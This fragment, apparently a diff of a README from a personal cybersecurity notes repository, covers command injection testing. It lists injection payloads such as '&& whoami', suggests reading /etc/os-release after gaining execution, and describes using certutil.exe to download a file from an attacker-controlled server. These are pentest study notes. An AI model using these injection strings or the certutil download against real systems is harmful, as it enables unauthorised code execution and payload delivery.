Berkanktk/CyberSecurity/README.md

 & whoami
 && whoami
 ```

+When found `cat /etc/os-release` can be used to find the OS version and other useful information.

 A useful tool in Windows we can use to gain RCE is `certutil.exe` (`certutil.exe -urlcache -f <url> <filename>`).
 This command is a native Windows CLI program installed as part of Certificate Services.
 It's handy in engagements because it is a binary signed by Microsoft and allows us to make HTTP/s connections.
 In our scenario, we can use it to make an HTTP request to download a file from a web server that we control to confirm that the command was executed.